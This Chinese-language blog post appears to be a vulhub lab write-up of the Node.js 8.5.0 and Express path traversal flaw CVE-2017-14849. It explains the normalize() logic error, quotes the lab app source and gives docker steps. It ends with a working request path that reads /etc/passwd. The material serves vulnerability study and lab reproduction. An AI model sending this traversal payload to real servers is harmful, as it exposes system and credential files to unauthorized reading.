Node.js目录穿越漏洞(CVE-2017-14849)

影响版本(wappalyzer)

Node.js 8.5.0 + Express 3.19.0-3.21.2
Node.js 8.5.0 + Express 4.11.0-4.15.5

Express框架:

Express是基于 Node.js 平台,快速、开放、极简的 web 开发框架

漏洞本质:

原因是 Node.js 8.5.0 对目录进行normalize操作时出现了逻辑错误,导致向上层跳跃的时候(如../../../../../../etc/passwd),在中间位置增加foo/../(如../../../foo/../../../../etc/passwd),即可使normalize返回/etc/passwd,但实际上正确结果应该是../../../../../../etc/passwd。

express这类web框架,通常会提供了静态文件服务器的功能,这些功能依赖于normalize函数。比如,express在判断path是否超出静态目录范围时,就用到了normalize函数,上述BUG导致normalize函数返回错误结果导致绕过了检查,造成任意文件读取漏洞。

当然,normalize的BUG可以影响的绝非仅有express,更有待深入挖掘。不过因为这个BUG是node 8.5.0 中引入的,在 8.6 中就进行了修复,所以影响范围有限。

应用层漏洞分析:静态文件目录被引用拼接

vulhub源码分析:

const express = require('express')
const app = express()
const path = require('path')

app.get('/', (req, res) => {
    res.send(`
                
                    
                    Hello vulhub!
                
                
                    

Hello {{ name }}

`) }) app.use('/static', express.static(path.join(__dirname, 'static'))); app.listen(3000, () => console.log('Example app listening on port 3000!'))
app.use(express.static(path.join(__dirname, 'public')));//设置静态文件目录

static/main.js被引用源码

var app = new Vue({
    el: '#app',
    data: {
        name: 'Vulhub'
    }
})

漏洞复现:kali+burp

0x01 进入主目录:cd vulhub/node/CVE-2017-14849

0x02 编译靶场:docker-compose build

0x03 运行靶场:docker-compose up -d 

0x04 访问靶场:ip(kali):3000

0x05 get抓包:路径修改为 /static/../../../a/../../../../etc/passwd 

Node.js目录穿越漏洞(CVE-2017-14849)_第1张图片

0x06 关闭靶场:sudo docker stop 容器名称

 

你可能感兴趣的:(vulhub漏洞复现,node.js)